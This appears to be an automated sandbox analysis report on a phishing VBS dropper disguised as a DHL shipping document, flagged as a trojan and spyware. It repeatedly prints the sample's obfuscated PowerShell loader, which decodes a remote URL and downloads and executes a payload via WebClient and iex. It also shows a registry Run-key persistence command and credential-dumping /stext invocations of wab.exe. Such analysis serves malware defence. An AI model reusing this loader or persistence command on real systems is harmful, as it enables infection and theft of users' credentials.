Initial sample: Strings found which are bigger than 50

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"

Yara signature match

Source: amsi32_7792.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@31/12@12/3

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,

19_2_004182CE

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 22_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,

22_2_00410DE1

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,

19_2_00418758

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,

19_2_00413D4C

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,

19_2_0040B58D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Proskriberes.Bet

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: \Sessions\1\BaseNamedObjects\jmoughoe-DMPW3B
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gslda24.jeh.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs"

Source: C:\Program Files (x86)\Windows Mail\wab.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7792

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe, wab.exe, 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wab.exe, 0000000A.00000002.2264740043.0000000023370000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe, 00000013.00000002.2023090570.00000000038AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
